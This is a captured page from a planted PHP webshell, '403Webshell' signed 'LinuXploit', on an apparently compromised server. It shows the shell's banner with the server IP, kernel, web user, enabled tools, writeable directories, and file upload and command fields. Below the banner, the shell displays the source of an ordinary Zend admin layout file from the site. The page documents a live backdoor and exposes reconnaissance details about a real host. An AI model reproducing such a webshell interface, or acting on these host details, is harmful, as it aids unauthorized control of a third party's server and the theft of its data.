403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/vanguarddmc.com/application/admin/layouts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/vanguarddmc.com/application/admin/layouts/layout.phtml
<?php
$object = Zend_Controller_Front::getInstance();
$options = Zend_Controller_Front::getInstance()->getParam('bootstrap')->getOption('bootstrap');
$baseUrl    =  $options['siteUrl'];
$modulename = $object->getRequest()->getModuleName();
$controller = $object->getRequest()->getControllerName();
$action     = $object->getRequest()->getActionName();
?>
<?php echo $this->doctype();?>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <?php echo $this->headTitle($options['siteName'] . " :: AdminPanel");?>
    <base href="<?php echo $options['siteUrl'];?>"/>
    <script type="text/javascript">
      baseurl = '<?php echo $options['siteUrl'];?>';
    </script>
    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" type="img/png" sizes="32x32" href="public/images/favicon-icon.png">
        <link rel="icon" type="img/png" sizes="96x96" href="public/images/favicon-icon.png">
        <link rel="apple-touch-icon" sizes="57x57" href="public/images/favicon-icon.png">
        <link rel="apple-touch-icon" sizes="114x114" href="public/images/favicon-icon.png">
      <?php 
       echo $this->headLink()->prependStylesheet('public/admin/lib/bootstrap/css/bootstrap.css')
                             ->appendStylesheet('public/admin/stylesheets/theme.css')
                             ->appendStylesheet('public/admin/lib/font-awesome/css/font-awesome.css');
    ?>
    <?php
     echo $this->headScript()->prependFile('public/admin/lib/jquery-1.7.2.min.js')
                             ->appendFile('public/admin/lib/bootstrap/js/bootstrap.js');
    ?>

	 <!-- <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.css" integrity="sha512-aOG0c6nPNzGk+5zjwyJaoRUgCdOrfSDhmMID2u4+OIslr0GjpLKo7Xm0Ao3xmpM4T8AmIouRkqwj1nrdVsLKEQ==" crossorigin="anonymous" />
    -->
    <!-- Demo page code -->
    <style type="text/css">
        #line-chart {
            height:300px;
            width:800px;
            margin: 0px auto;
            margin-top: 1em;
        }
        .brand { font-family: georgia, serif; }
        .brand .first {
            color: #ccc;
            font-style: italic;
        }
        .brand .second {
            color: #fff;
            font-weight: bold;
        }
        .btn-group {
              display: inline-block;
      }
       .btn-group > .btn-group {
          float: left;
              display: inline-block;
      }
     
    </style>


    <!-- Le HTML5 shim, for IE6-8 support of HTML5 elements -->
    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

    <!-- Le fav and touch icons -->
    <link rel="shortcut icon" href="../assets/ico/favicon.ico">
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="../assets/ico/apple-touch-icon-144-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="../assets/ico/apple-touch-icon-114-precomposed.png">
    <link rel="apple-touch-icon-precomposed" sizes="72x72" href="../assets/ico/apple-touch-icon-72-precomposed.png">
    <link rel="apple-touch-icon-precomposed" href="../assets/ico/apple-touch-icon-57-precomposed.png">
    <link rel="stylesheet" type="text/css" href="public/admin/stylesheets/easyui.css">
<link rel="stylesheet" type="text/css" href="public/admin/stylesheets/icon.css">
<link rel="stylesheet" type="text/css" href="public/admin/stylesheets/color.css">
<link rel="stylesheet" type="text/css" href="public/admin/stylesheets/demo.css">
<link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.css">
  </head>

  <!--[if lt IE 7 ]> <body class="ie ie6"> <![endif]-->
  <!--[if IE 7 ]> <body class="ie ie7 "> <![endif]-->
  <!--[if IE 8 ]> <body class="ie ie8 "> <![endif]-->
  <!--[if IE 9 ]> <body class="ie ie9 "> <![endif]-->
  <!--[if (gt IE 9)|!(IE)]><!--> 
  <body class=""> 
  <!--<![endif]-->
<!-- Start top header menu section -->    
<?php echo $this->render('header_menu.phtml'); ?>
<!-- End top header menu section -->  
<!-- Start left menu section --> 
<?php echo $this->render('left_menu.phtml'); ?>
<!-- End left menu section --> 

<!-- Start main content section --> 
<?php echo $this->layout()->content; ?>
<!-- End main content section --> 

 <!-- Start footer section --> 
<?php echo $this->render('footer.phtml'); ?>
<!-- End footer section --> 
<?php if (($modulename == 'admin' ) && ($controller == 'travelogues' || $controller == 'services' || $controller == 'staticpage') && ($action == 'addtravelogues' || $action == 'edittravelogues' || $action == 'editservice' || $action == 'editpage'  )) {?>
<link href="public/admin/summernote/summernote.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="public/admin/summernote/summernote.js"></script>
<script type="text/javascript" src="public/admin/summernote/editor.js"></script>

<?php }else{?>
<script type="text/javascript" src="https://cdn.ckeditor.com/4.11.2/full/ckeditor.js"></script>
<script type="text/javascript" src="public/admin/lib/jquery-1.9.1.min.js"></script>
<script type="text/javascript" src="public/admin/lib/jquery.easyui.min.js"></script>
<?php }?>


<script type="text/javascript" src="public/admin/lib/jquery.easyui.min.js"></script>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js"></script>
  </body>
</html>



Youez - 2016 - github.com/yon3zu
LinuXploit